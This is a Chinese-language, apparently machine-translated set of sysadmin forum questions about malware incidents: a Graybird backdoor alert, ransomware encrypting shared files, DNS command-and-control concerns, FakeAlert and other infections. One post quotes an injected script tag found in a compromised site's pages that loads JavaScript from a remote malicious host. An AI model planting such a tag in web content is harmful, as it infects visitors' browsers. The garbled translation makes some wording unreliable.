我的主机发送了一个通知,说服务器感染了恶意软件,这似乎不是很受欢迎。 赛门铁克网站关于这个恶意软件显示Windows机器为目标,但不是CentOS。 任何人都知道这个恶意软件到底是什么? 这是一个虚惊的机会是什么? 我可以安装任何易于使用的工具,可以安全地从SSH扫描我的系统,而不会破坏任何系统文件? 在过去的24小时内,赛门铁克分析师发现恶意软件configuration为与networking上的资源进行通信。 下面列出了恶意软件和您的相关资源。 MD5检测ASN描述b83ff89585d668c3ca96b34b44da4093 Backdoor.Graybird!Gen 16265 www.dymll.com,82.192.XXX.XXX,82.192.XXX.0 / 19,ripencc,NL,FIBERRING LeaseWeb BV,NL 请使用这些信息来调查您networking的潜在滥用情况,并根据您自己的内部程序采取纠正措施。
t好像我们的域名计算机被rasomware感染了,把文件变成encryption的文件,以.crypted结尾。 很多文件已经改变,我们有备份。 同时,扫描真正的恶意软件/病毒/特洛伊目前还没有任何结果。 我没有扫描所有的电脑,但我注意到,已经改变的文件只在共享文件夹上。 我已经尝试了几个工具,因为我有原始文件(至less有一些)的副本,但我似乎无法解密它们。 至less还没有。 我想 – 但我可能是错的,也许只有一台能够访问所有这些共享文件夹的计算机实际上被感染了,并且它改变了这些文件名。 这可能吗 ? 我查过的电脑上没有findencryption的本地文件。 我如何检查? 有任何想法吗 ? 文件已经改为“filename.exe.NUMBER {[email protected]},我试着与地址进行沟通 – 一些知道代理商在哪里要求5000美元的人。 任何想法,将不胜感激。
我的网站被Google / StopBadware.org标记为危险,我在几个js / html文件中发现了这个: <script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script> <!–a0e2c33acd6c12bdc9e3f3ba50c98197–> 我清理了几个文件,我恢复备份,但如何了解如何安装蠕虫? 我可以在日志文件中find什么? 这个服务器,一个Centos 5,只能作为一个Apache服务器,用我们的程序,一个tikiwiki,一个drupal安装。 谢谢 塞德里克
像往常一样,我们正试图在组织中进一步加强安全性。 目前我的焦点是一个被盗用的XP客户端使用DNS查询作为命令/控制通道(Google“dns恶意软件命令控制通道”)的可能性。 当然,这首先要顾客可以妥协, 一些我们认为不太可能的东西。 那说… 我们目前是Windows Server 2003 AD商店,所有DNS区域都存储在AD中。 DNS服务器被允许转发到我们的ISP的DNS服务器 – 这是一些服务器所需要的东西,即:我们需要parsingB2B的外部地址。 XP客户端和Windows服务器位于同一个域中,因此共享相同的DNS服务器。 客户端因此可以执行外部地址查找。 如果客户端受到攻击,可以在查找whatsmynextmove.hacker.com之前进行,而该域的SOA可以返回一个包含控制指令的精心制作的回复。 所以,问题是,任何人都可以想办法阻止XP客户端执行除本地DNS域(AD森林)以外的域的DNS查询。 我的想法到目前为止: 1)获取XP客户端使用的某种代理中间人DNS产品。 代理筛选器查找除内部域以外的域。 2)确定我们需要解决的所有外部域,并为每个域configuration条件转发器,例如:microsoft.com,verisign.com,redhat.com等等。我不确定有多less条件转发器可以configuration。 任何想法….任何人?
除了最后一个八位字节之外,IP隐藏在apache日志中用于隐私。 /结算是我们的应用程序开始页面。 但它发送POST请求并没有任何意义,并得到500响应。 或者,也许这是合法的旧IE 7浏览器谁不能处理我们的网站,ant设置成循环? 有大约20000个这样的请求 xx.xx.xx.223 – – [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)" xx.xx.xx.223 – – [30/May/2014:13:40:54 +0200] "POST /billing HTTP/1.1" 500 613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows […]
对于支持小型IDE的Windows Server 2012标准GUI版本 在我的第一台服务器上获得恶意软件保护已经成为比我想象的要大得多的问题。 我的研究涵盖了很多页面,但以下2个链接脱颖而出: https://technet.microsoft.com/en-us/library/hh831778 (图表的最后一行) http://blogs.technet.com/b/clientsecurity/archive/2012/11/05/more-information-on-microsoft-antimalware-protection-on-windows-8-and-windows-server-2012.aspx 我不想开始一场意见战争,所以如果这个post被问到错误的论坛或错误的方式,只是让我知道。 但是我需要为我的开发环境安装一些恶意软件保护,我不知道该怎么做。 由于我没有pipe理大量的服务器或客户端,所以Defender应该是足够的,直到我有更多的经验,并了解我正在处理更大的恶意软件检测pipe理系统。 但是我甚至不确定Defender可以在Server 2012上安装和维护,或者如何做,所以如果有人能够给出简单的指示,在Server 2012上安装Defender,假设它是一个可以接受/支持的解决scheme,我会很感激。 我的IDE服务器并没有受到太多的攻击,但显然我需要某种forms的保护。 解决scheme基于以下答案: 我想跟随其他新服务器的结果作为我自己。 我从我的Microsoft订阅页面的.iso文件创build了一个SCCM安装盘,然后在\ smssetup \ client目录中findscepinstall.exe。 我从CD中运行它,并安装了“System Center Endpoint Protection”,这是有效的,因此看起来像Defender。 我的重要教训是,我正在寻找错误的名字。 再次,格雷格大thx。 我现在开始学习SCCM …
最近我们得到了一个用户,他的机器上有一些恶意软件 – 我们运行了我们的McAfee VirusScan Enterprise软件,恶意软件字节反恶意软件,组合修复,adwcleaner和劫持这只是几个应用程序。 我还梳理了他安装的程序,浏览器扩展/附件,重置浏览器设置等等,但似乎即使恶意软件从系统中“移除”(根据防病毒/恶意软件应用程序),随机广告似乎仍然显示在浏览器窗口内,并在广告底部写着“jabuticaba广告”。 我检查了可疑的进程和位置,如应用程序数据目录,程序数据,临时等…但似乎无法find任何东西。 也尝试重新分析/其他Windowsconfiguration文件,但问题仍然在那里发生。 有没有什么办法可以查明这些广告如何以及从何处通过工具/实用程序加载到浏览器中?
我的网站上的服务器被感染使用(赦免我的迷惑) YES Exploit System 这是一个“控制工具包”。 我从http://cassandrasecurity.com/?p=282find了一些关于它的信息 我怎样才能移除这个控制套件并保护系统? 木马扫描揭示了一个被感染的GD库。
我们networking上的一些用户最近感染了AntiVirus Pro 2010病毒。 用户禁用了防病毒软件来安装一个导致系统上安装了AntiVirus pro的应用程序(我们无法得知他们尝试安装此应用程序的位置或原因)。 通过使用BackTrack 4删除病毒来编辑registry设置并删除受感染的文件。 然后,我们启用了反病毒(Avast),并运行了完整的病毒扫描,返回零结果。 然后,我们尝试使用导致“连接失败”消息的防病毒自动更新function。 在使用PING和其他利用ICMP的工具testing连通性时,我们能够validation连接到LAN和WAN(以及DNS查找)的服务器。 但是,当试图连接到我们的局域网或广域网内的任何网站(通过DNS或IP),我们收到“连接超时”。 另外一个FTP连接是可能的以及一个主要的其他协议。 系统主机(C:\ WINDOWS \ system32 \ drivers \ etc \ hosts)文件已被检查并且不包含任何不规则的条目。 特别是端口80的stream量似乎被阻塞,我们相信它的病毒残留。 有没有解决这个问题的build议? 我们已经进行了大量search,并使用了专门用于清除此病毒的所有工具。 我们甚至试图find病毒所做的修改的完整列表,并让我们的一个开发人员在仿真环境中运行仿真,试图想出这个列表。
我们刚刚发生了第二起Windows XP家庭安全恶意软件(malwarebytes称为Trojan.fakeAlert)的变种。 它设法杀死我们的杀毒软件(32点),然后终止尝试启动任务pipe理器或安装恶意软件。 我已经设法通过以pipe理员身份login进行清除,在启动之前远程删除文件,并获取恶意软件来扫描并删除它。 我的问题涉及预防: 所以我的问题是, FakeAlert是如何工作的? !….在互联网上我什么都没有find,详细解释它是如何进入和执行的,它似乎embedded在网页中,然后自动下载并运行? 我们可以使用malwarebytes来清除它(并且有点愤怒,windows不会阻止这些东西安装控制面板,中断ctrl-alt-del / ctrl-alt-esc等等),但是我们不情愿如果有一个免费的方法来阻止它,但要这样做,我们需要知道它是如何工作的(如果MBAM将在未来保持我们的安全),以获取Malwarebytes站点许可证。 有关我们设置的更多细节,我们的客户端机器是Win XP盒子,连接到win server 2003 AD域